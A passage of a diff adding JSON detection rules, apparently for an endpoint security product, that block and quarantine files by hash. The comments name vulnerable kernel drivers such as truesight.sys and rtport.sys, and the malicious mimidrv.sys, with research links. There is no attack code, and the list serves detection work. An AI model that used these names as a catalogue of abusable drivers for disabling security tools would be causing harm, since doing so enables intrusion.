+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11a14e3d-25ad-5e0c-b911-e369c24b4835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832694Z",
+ "creation_date": "2026-03-23T11:45:30.832696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7be7b71c3bdbc7e4868e4b2ae6ae20adad8bef30a77b3387810243459dcaa548",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11a9a0e6-50af-540c-a316-94916c1b45cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487396Z",
+ "creation_date": "2026-03-23T11:45:31.487398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c910fea59299110d2c171f5ea22966bd06108fdfda45f2e01f7f758ddefc7ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11bd6a87-11c3-5c86-a2f6-d60e06b828f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820495Z",
+ "creation_date": "2026-03-23T11:45:30.820497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "353a36d445e4ff60396702ad7b22b5f30bdce52aa05126e2701714a3f11a11c7",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11beae37-c0f2-517f-bc62-3e0ed64447b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818260Z",
+ "creation_date": "2026-03-23T11:45:30.818262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38535a0e9fc0684308eb5d6aa6284669bc9743f11cb605b79883b8c13ef906ad",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11c0f44a-12de-5f90-bba6-7c0c8d4f3ebd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143254Z",
+ "creation_date": "2026-03-23T11:45:31.143256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db2234daab27f977b59c1d9e1540ca0dab986334bffd435233b1f9213b8f6b45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11d9d740-1d79-51ef-b926-aa915e1794a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458607Z",
+ "creation_date": "2026-03-23T11:45:30.458611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f62282e44713d7d2f4c780027c7bbb82ba0b491c8836dfae33a2d82e8b5a43d2",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11ec0f90-8611-59a7-9d30-0e5646d2cdf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147963Z",
+ "creation_date": "2026-03-23T11:45:31.147966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea1fc5332092cbe167622a54ff2f118a7235a7baa948c77e39a2ffafb285b1a1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "11ee222a-f75e-58c9-9b8e-1f01a57a67f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613581Z",
+ "creation_date": "2026-03-23T11:45:29.613582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d9346e6f46f831e263385a9bd32428e01919cca26a035bbb8e9cb00bf410bc3",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1202839a-e63e-59e8-a369-0ec81d96cb57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486524Z",
+ "creation_date": "2026-03-23T11:45:31.486528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9799688dc73f444eae7b4b7e681ae31d6e4cfcf9c48f59ac5b6132b22e65f58f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "121621fa-2e99-5adf-a1cb-d7b99a284449",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825973Z",
+ "creation_date": "2026-03-23T11:45:30.825976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d52c8e1568a6bbf29705a5be45a76a4b87dc54d557d5fd17a025c951d643b882",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "121963dd-984f-5ba1-83b8-a9e296ab6676",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816080Z",
+ "creation_date": "2026-03-23T11:45:30.816083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df4c02beb039d15ff0c691bbc3595c9edfc1d24e783c8538a859bc5ea537188d",
+ "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "121e33f0-7dc2-5f8a-9a84-e7de2621cf4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619592Z",
+ "creation_date": "2026-03-23T11:45:29.619594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619599Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ed10b06e6b4b0548bdada6b5665432306e934df173707edd3af9e4a4547e43e",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1224c893-5ce2-5553-8b9a-9660352e6af1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156414Z",
+ "creation_date": "2026-03-23T11:45:31.156416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156422Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4373d838097eefc9de85cff89356cf450641a3b3f057cee49e7ef1333a54ceed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "122509f3-168d-5341-9365-776d9a0a5d0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821728Z",
+ "creation_date": "2026-03-23T11:45:30.821732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40eef1f52c7b81750cee2b74b5d2f4155d4e58bdde5e18ea612ab09ed0864554",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12306b70-0bee-5294-813d-190b7814b118",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821300Z",
+ "creation_date": "2026-03-23T11:45:30.821304Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e502c2736825ea0380dd42effaa48105a201d4146e79de00713b8d3aaa98cd65",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "123f5739-b970-53e7-ac63-a51df4991e40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467002Z",
+ "creation_date": "2026-03-23T11:45:30.467006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467015Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71c0c98aa54dc88af8b094ceef88352052d592e0f40892825dedbf1abba16635",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1241a202-b03c-5c34-8347-dbdabdcbeccf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452622Z",
+ "creation_date": "2026-03-23T11:45:30.452625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452633Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23787eb342fd38da73ce785023176f98304267c6f6fa8a50e718da096c7a7951",
+ "comment": "Vulnerable Kernel Driver (aka phydmaccx86.sys) [https://www.loldrivers.io/drivers/1055625b-3480-48b3-9556-8628a745d8f0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1241b2fe-a129-5bbc-aace-d89b135da0a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466352Z",
+ "creation_date": "2026-03-23T11:45:30.466355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1250906a-82b8-59ee-b5db-212b4b7708a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819864Z",
+ "creation_date": "2026-03-23T11:45:30.819866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819884Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c049aff27517fe269517b07bdc8ef1e7b26e1e76276b02dc5a9688901a88de3",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12541cac-c629-5316-ba0e-7cd9558387db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826151Z",
+ "creation_date": "2026-03-23T11:45:30.826153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c3eac96b30874254834799669ba353408f3ad1e088d4294c9aabd76e8365019",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "126605a2-954b-53a9-9480-a75e716dd102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490384Z",
+ "creation_date": "2026-03-23T11:45:31.490386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0abc0c88644a441a816aa86b0d10a0ed9c234b67e3deb276db29a752575b61a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "126e6280-2b2e-5132-b0a8-a5013c769903",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464973Z",
+ "creation_date": "2026-03-23T11:45:30.464977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1272251d-faf7-52b1-994d-8fee62ad4c06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
